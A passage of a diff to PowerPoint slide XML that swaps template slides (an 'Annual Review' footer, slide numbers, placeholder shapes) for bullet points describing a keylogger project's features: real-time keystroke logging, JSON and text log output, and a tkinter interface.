+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
                 <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
+                  <a:schemeClr val="tx1"/>
                 </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>3/21/202</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" spc="10" dirty="0">
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Real-time Key Logging</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
                 <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
+                  <a:schemeClr val="tx1"/>
                 </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>4</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" spc="130" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="50" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>A</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="15" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>nnu</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="10" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>al</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="-140" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>R</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="35" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>e</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="90" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>v</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="-35" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>i</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="35" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>e</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="15" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>w</a:t>
-            </a:r>
-            <a:endParaRPr sz="1100">
-              <a:latin typeface="Trebuchet MS"/>
-              <a:cs typeface="Trebuchet MS"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="9" name="object 9"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="sldNum" sz="quarter" idx="7"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="6985" rIns="0" bIns="0" rtlCol="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="38100">
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" marR="0" lvl="1" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
               <a:lnSpc>
                 <a:spcPct val="100000"/>
               </a:lnSpc>
               <a:spcBef>
-                <a:spcPts val="55"/>
+                <a:spcPct val="0"/>
               </a:spcBef>
-            </a:pPr>
-            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
-              <a:rPr spc="10" dirty="0"/>
-              <a:t>7</a:t>
-            </a:fld>
-            <a:endParaRPr spc="10" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide8.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="object 2"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="752475" y="6486037"/>
-            <a:ext cx="1773555" cy="166370"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPts val="1275"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1100" spc="20" dirty="0">
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buChar char="•"/>
+              <a:tabLst/>
+            </a:pPr>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
                 <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
+                  <a:schemeClr val="tx1"/>
                 </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>3/21/202</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" spc="10" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>4</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" spc="130" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="50" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>A</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="15" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>nnu</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="10" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>al</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="-140" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>R</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="35" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>e</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="90" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>v</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="-35" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>i</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="35" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>e</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="15" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>w</a:t>
-            </a:r>
-            <a:endParaRPr sz="1100">
-              <a:latin typeface="Trebuchet MS"/>
-              <a:cs typeface="Trebuchet MS"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="object 3"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="9353550" y="5362575"/>
-            <a:ext cx="457200" cy="457200"/>
-          </a:xfrm>
-          <a:custGeom>
-            <a:avLst/>
-            <a:gdLst/>
-            <a:ahLst/>
-            <a:cxnLst/>
-            <a:rect l="l" t="t" r="r" b="b"/>
-            <a:pathLst>
-              <a:path w="457200" h="457200">
-                <a:moveTo>
-                  <a:pt x="457200" y="0"/>
-                </a:moveTo>
-                <a:lnTo>
-                  <a:pt x="0" y="0"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="0" y="457200"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="457200" y="457200"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="457200" y="0"/>
-                </a:lnTo>
-                <a:close/>
-              </a:path>
-            </a:pathLst>
-          </a:custGeom>
-          <a:solidFill>
-            <a:srgbClr val="42AF51"/>
-          </a:solidFill>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="4" name="object 4"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="6696075" y="1695450"/>
-            <a:ext cx="314325" cy="323850"/>
-          </a:xfrm>
-          <a:custGeom>
-            <a:avLst/>
-            <a:gdLst/>
-            <a:ahLst/>
-            <a:cxnLst/>
-            <a:rect l="l" t="t" r="r" b="b"/>
-            <a:pathLst>
-              <a:path w="314325" h="323850">
-                <a:moveTo>
-                  <a:pt x="314325" y="0"/>
-                </a:moveTo>
-                <a:lnTo>
-                  <a:pt x="0" y="0"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="0" y="323850"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="314325" y="323850"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="314325" y="0"/>
-                </a:lnTo>
-                <a:close/>
-              </a:path>
-            </a:pathLst>
-          </a:custGeom>
-          <a:solidFill>
-            <a:srgbClr val="2D83C3"/>
-          </a:solidFill>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="5" name="object 5"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="9353550" y="5895975"/>
-            <a:ext cx="180975" cy="180975"/>
-          </a:xfrm>
-          <a:custGeom>
-            <a:avLst/>
-            <a:gdLst/>
-            <a:ahLst/>
-            <a:cxnLst/>
-            <a:rect l="l" t="t" r="r" b="b"/>
-            <a:pathLst>
-              <a:path w="180975" h="180975">
-                <a:moveTo>
-                  <a:pt x="180975" y="0"/>
-                </a:moveTo>
-                <a:lnTo>
-                  <a:pt x="0" y="0"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="0" y="180975"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="180975" y="180975"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="180975" y="0"/>
-                </a:lnTo>
-                <a:close/>
-              </a:path>
-            </a:pathLst>
-          </a:custGeom>
-          <a:solidFill>
-            <a:srgbClr val="2D936B"/>
-          </a:solidFill>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="6" name="object 6"/>
-          <p:cNvPicPr/>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId2" cstate="print"/>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="66675" y="3381373"/>
-            <a:ext cx="2466975" cy="3419475"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-      </p:pic>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="7" name="object 7"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="739775" y="654938"/>
-            <a:ext cx="7543165" cy="678180"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16510" rIns="0" bIns="0" rtlCol="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="12700">
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Logs keystrokes as they happen and saves them in real-time.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="285750" marR="0" lvl="0" indent="-285750" algn="just" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
               <a:lnSpc>
                 <a:spcPct val="100000"/>
               </a:lnSpc>
               <a:spcBef>
-                <a:spcPts val="130"/>
+                <a:spcPct val="0"/>
               </a:spcBef>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="4250" spc="15" dirty="0"/>
-              <a:t>THE</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="4250" spc="20" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="4250" spc="10" dirty="0"/>
-              <a:t>WOW</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="4250" spc="85" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="4250" spc="10" dirty="0"/>
-              <a:t>IN</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="4250" spc="-5" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="4250" spc="15" dirty="0"/>
-              <a:t>YOUR</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="4250" spc="-10" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="4250" spc="20" dirty="0"/>
-              <a:t>SOLUTION</a:t>
-            </a:r>
-            <a:endParaRPr sz="4250"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="8" name="object 8"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="11277218" y="6473337"/>
-            <a:ext cx="228600" cy="191770"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="6985" rIns="0" bIns="0" rtlCol="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="38100">
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+              <a:tabLst/>
+            </a:pPr>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>JSON and Text Log Generation</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" marR="0" lvl="1" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
               <a:lnSpc>
                 <a:spcPct val="100000"/>
               </a:lnSpc>
               <a:spcBef>
-                <a:spcPts val="55"/>
+                <a:spcPct val="0"/>
               </a:spcBef>
-            </a:pPr>
-            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
-              <a:rPr sz="1100" spc="10" dirty="0">
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buChar char="•"/>
+              <a:tabLst/>
+            </a:pPr>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
                 <a:solidFill>
-                  <a:srgbClr val="2D936B"/>
+                  <a:schemeClr val="tx1"/>
                 </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>8</a:t>
-            </a:fld>
-            <a:endParaRPr sz="1100">
-              <a:latin typeface="Trebuchet MS"/>
-              <a:cs typeface="Trebuchet MS"/>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Generates logs in both JSON and text formats for easy analysis.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="285750" marR="0" lvl="0" indent="-285750" algn="just" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+              <a:tabLst/>
+            </a:pPr>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>User-Friendly GUI</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" marR="0" lvl="1" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buChar char="•"/>
+              <a:tabLst/>
+            </a:pPr>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Built using </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>tkinter</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>, providing an intuitive interface for users.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" marR="0" lvl="1" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buChar char="•"/>
+              <a:tabLst/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
             </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:tabLst/>
+            </a:pPr>
+            <a:r>
